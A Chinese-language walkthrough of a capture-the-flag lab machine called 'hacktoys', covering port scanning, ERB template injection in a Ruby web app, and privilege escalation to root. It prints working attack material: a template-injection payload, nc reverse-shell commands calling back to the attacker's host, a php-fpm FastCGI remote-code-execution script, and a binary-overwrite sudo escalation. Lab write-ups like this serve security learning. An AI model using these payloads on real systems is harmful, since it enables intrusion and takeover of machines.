信息收集
nmap扫端口
nmap -sS 10.20.73.121 -T4Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-16 03:48 EDT
Nmap scan report for hacktoys.lan (10.20.73.121)
Host is up (0.00010s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
3000/tcp open ppp
MAC Address: 00:0C:29:82:76:43 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds开了22 和 3000端口,nmap -sV 扫详细服务
nmap -sV 10.20.73.121 -p3000,22┌──(root㉿kali)-[~]
└─# nmap -sV 10.20.73.121 -p3000,22
Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-16 03:49 EDT
Nmap scan report for hacktoys.lan (10.20.73.121)
Host is up (0.00031s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
3000/tcp open ssl/ppp?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.93%T=SSL%I=7%D=9/16%Time=66E7E361%P=x86_64-pc-linux-gn
SF:u%r(GenericLines,3EF,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nContent-Len
SF:gth:\x20930\r\n\r\nPuma\x20caught\x20this\x20error:\x20Invalid\x20HTTP\
SF:x20format,\x20parsing\x20fails\.\x20Are\x20you\x20trying\x20to\x20open\
SF:x20an\x20SSL\x20connection\x20to\x20a\x20non-SSL\x20Puma\?\x20\(Puma::H
SF:ttpParserError\)\n/usr/local/rvm/gems/ruby-3\.1\.0/gems/puma-6\.4\.2/li
SF:b/puma/client\.rb:268:in\x20`execute'\n/usr/local/rvm/gems/ruby-3\.1\.0
SF:/gems/puma-6\.4\.2/lib/puma/client\.rb:268:in\x20`try_to_finish'\n/usr/
SF:local/rvm/gems/ruby-3\.1\.0/gems/puma-6\.4\.2/lib/puma/server\.rb:298:i
SF:n\x20`reactor_wakeup'\n/usr/local/rvm/gems/ruby-3\.1\.0/gems/puma-6\.4\
SF:.2/lib/puma/server\.rb:248:in\x20`block\x20in\x20run'\n/usr/local/rvm/g
SF:ems/ruby-3\.1\.0/gems/puma-6\.4\.2/lib/puma/reactor\.rb:119:in\x20`wake
SF:up!'\n/usr/local/rvm/gems/ruby-3\.1\.0/gems/puma-6\.4\.2/lib/puma/react
SF:or\.rb:76:in\x20`block\x20in\x20select_loop'\n/usr/local/rvm/gems/ruby-
SF:3\.1\.0/gems/puma-6\.4\.2/lib/puma/reactor\.rb:76:in\x20`select'\n/usr/
SF:local/rvm/gems/ruby-3\.1\.0/gems/puma-6\.4\.2/lib/puma/reactor\.rb:76:i
SF:n\x20`select_loop'\n/usr/loc")%r(GetRequest,169E,"HTTP/1\.0\x20403\x20F
SF:orbidden\r\ncontent-type:\x20text/html;\x20charset=UTF-8\r\nContent-Len
SF:gth:\x205702\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\"en\">\n<head>\n
SF:\x20\x20<meta\x20charset=\"utf-8\"\x20/>\n\x20\x20<meta\x20name=\"viewp
SF:ort\"\x20content=\"width=device-width,\x20initial-scale=1\">\n\x20\x20<
SF:meta\x20name=\"turbo-visit-control\"\x20content=\"reload\">\n\x20\x20<t
SF:itle>Action\x20Controller:\x20Exception\x20caught</title>\n\x20\x20<sty
SF:le>\n\x20\x20\x20\x20body\x20{\n\x20\x20\x20\x20\x20\x20background-colo
SF:r:\x20#FAFAFA;\n\x20\x20\x20\x20\x20\x20color:\x20#333;\n\x20\x20\x20\x
SF:20\x20\x20color-scheme:\x20light\x20dark;\n\x20\x20\x20\x20\x20\x20supp
SF:orted-color-schemes:\x20light\x20dark;\n\x20\x20\x20\x20\x20\x20margin:
SF:\x200px;\n\x20\x20\x20\x20}\n\n\x20\x20\x20\x20body,\x20p,\x20ol,\x20ul
SF:,\x20td\x20{\n\x20\x20\x20\x20\x20\x20font-family:\x20helvetica,\x20ver
SF:dana,\x20arial,\x20sans-serif;\n\x20\x20\x20\x20\x20\x20font-size:\x20\
SF:x20\x2013px;\n\x20\x20\x20\x20\x20\x20line-height:\x2018px;\n\x20\x20\x
SF:20\x20}\n\n\x20\x20\x20\x20pre\x20{\n\x20\x20\x20\x20\x20\x20font-size:
SF:\x2011px;\n\x20\x20\x20\x20\x20\x20white-space:\x20pre-wrap;\n\x20\x20\
SF:x20\x20}\n\n\x20\x20\x20\x20pre\.box\x20{\n\x20\x20\x20\x20\x20\x20bord
SF:er:\x201px\x20solid\x20#EEE;\n\x20\x20\x20\x20\x20\x20padding:\x2010px;
SF:\n\x20\x20\x20\x20\x20\x20margin:\x200px;\n\x20\x20\x20\x20\x20\x20widt
SF:h:\x20958px;\n\x20\x20\x20\x20}\n\n\x20\x20\x20\x20header\x20{\n\x20\x2
SF:0\x20\x20\x20\x20color:\x20#F0F0F0;\n\x20\x20\x20\x20\x20\x20background
SF::\x20#C00;\n\x20\x20\x20\x20\x20\x20padding:");
MAC Address: 00:0C:29:82:76:43 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.17 seconds看到了ssl,尝试使用https访问
漏洞发现
web打点
查看这五个链接,如图所示,这五个链接都是黑客工具
接下来测试下面的输入框
随意输入内容提示Product does not exist
发现这串字符串就是message的参数,修改message为123查看
提示的字符变成了123,这边很明显有一个xss漏洞
不过并没什么用
查看网站变成语言,是ruby
Ruby/ERB ssti
经过搜索,这里是ERB的ssti,可用使用<%= (ruby代码) %>模板来执行命名
测试一下,将<%= 7*7 %>url编码传入
输入了49,说名存在漏洞
尝试反弹shell
构造反弹shell命令
<%= system("nc -e /bin/sh 10.20.73.233 5555"); %>
有pyhton ,使用python开一下虚拟终端
python3 -c "import pty;pty.spawn('/bin/bash')"
提权
在本地开了一个80,9000端口,将这两个端口转发出来
lidia@hacktoys:/tmp$ ./socat TCP-LISTEN:9001,reuseaddr,fork TCP:127.0.0.1:9000 &
<CP-LISTEN:9001,reuseaddr,fork TCP:127.0.0.1:9000 &
[1] 1281
lidia@hacktoys:/tmp$ ./socat TCP-LISTEN:8080,reuseaddr,fork TCP:127.0.0.1:80 &
< TCP-LISTEN:8080,reuseaddr,fork TCP:127.0.0.1:80 &
[2] 1282
lidia@hacktoys:/tmp$ ss -nltp
ss -nltp
State Recv-Q Send-Q Local Address:Port Peer Address:PortProcess
LISTEN 0 5 0.0.0.0:8080 0.0.0.0:* users:(("socat",pid=1282,fd=5))
LISTEN 0 511 127.0.0.1:80 0.0.0.0:*
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 4096 127.0.0.1:9000 0.0.0.0:*
LISTEN 0 1024 0.0.0.0:3000 0.0.0.0:* users:(("ruby",pid=593,fd=7))
LISTEN 0 5 0.0.0.0:9001 0.0.0.0:* users:(("socat",pid=1281,fd=5))
LISTEN 0 128 [::]:22 [::]:* 访问转发出来的 80端口
测了半天也找到什么漏洞
转移目标至9000端口
发现靶机进程中有php-fpm,它的默认端口正好是9000
https://book.hacktricks.xyz/network-services-pentesting/9000-pentesting-fastcgi
在网上找到大佬的的脚本可以直接命令执行
改个端口和路径就能直接打
#!/bin/bash
PAYLOAD="<?php echo '<!--'; system('whoami'); echo '-->';"
FILENAMES="/var/www/html/index.php" # Exisiting file path
HOST=$1
B64=$(echo "$PAYLOAD"|base64)
for FN in $FILENAMES; do
OUTPUT=$(mktemp)
env -i \
PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
cgi-fcgi -bind -connect $HOST:9001 &> $OUTPUT
cat $OUTPUT
done
发现使用dodi用户,直接反弹shell提权至该用户
提权至dodi
修改执行的命令
#!/bin/bash
PAYLOAD="<?php echo '<!--'; system('nc -e /bin/bash 10.20.73.233 6666'); echo '-->';"
FILENAMES="/var/www/html/index.php" # Exisiting file path
HOST=$1
B64=$(echo "$PAYLOAD"|base64)
for FN in $FILENAMES; do
OUTPUT=$(mktemp)
env -i \
PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
cgi-fcgi -bind -connect $HOST:9001 &> $OUTPUT
cat $OUTPUT
done
提权至root
sudo -l 发现该用户可以使用sudo运行/usr/local/bin/rvm_rails.sh这个脚本
运行脚本
dodi@hacktoys:/var/www/html$ sudo /usr/local/bin/rvm_rails.sh
sudo /usr/local/bin/rvm_rails.sh
Usage:
rails COMMAND [options]
You must specify a command:
new Create a new Rails application. "rails new my_app" creates a
new application called MyApp in "./my_app"
plugin new Create a new Rails railtie or engine
All commands can be run with -h (or --help) for more information.
Inside a Rails application directory, some common commands are:
console Start the Rails console
server Start the Rails server
test Run tests except system tests发现是rails
Rails 是使用Ruby 语言编写的网页程序开发框架
分析脚本
#!/bin/bash
export rvm_prefix=/usr/local
export MY_RUBY_HOME=/usr/local/rvm/rubies/ruby-3.1.0
export RUBY_VERSION=ruby-3.1.0
export rvm_version=1.29.12
export rvm_bin_path=/usr/local/rvm/bin
export GEM_PATH=/usr/local/rvm/gems/ruby-3.1.0:/usr/local/rvm/gems/ruby-3.1.0@global
export GEM_HOME=/usr/local/rvm/gems/ruby-3.1.0
export PATH=/usr/local/rvm/gems/ruby-3.1.0/bin:/usr/local/rvm/gems/ruby-3.1.0@global/bin:/usr/local/rvm/rubies/ruby-3.1.0/bin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games:/usr/local/rvm/bin
export IRBRC=/usr/local/rvm/rubies/ruby-3.1.0/.irbrc
export rvm_path=/usr/local/rvm
exec /usr/local/rvm/gems/ruby-3.1.0/bin/rails "$@"脚本之后执行了/usr/local/rvm/gems/ruby-3.1.0/bin/rails这个文件
dodi@hacktoys:/var/www/html$ cat /etc/group | grep rvm
cat /etc/group | grep rvm
rvm:x:1002:lidia,rootlidia用户对该文件有修改权限,使用该用户在这个文件中写入/bin/bash即可提权
lidia@hacktoys:/tmp$ echo "/bin/bash" > /usr/local/rvm/gems/ruby-3.1.0/bin/rails
<in/bash" > /usr/local/rvm/gems/ruby-3.1.0/bin/rails
lidia@hacktoys:/tmp$ dodi@hacktoys:/var/www/html$ sudo /usr/local/bin/rvm_rails.sh
sudo /usr/local/bin/rvm_rails.sh
root@hacktoys:/var/www/html# id
id
uid=0(root) gid=0(root) groups=0(root),1002(rvm)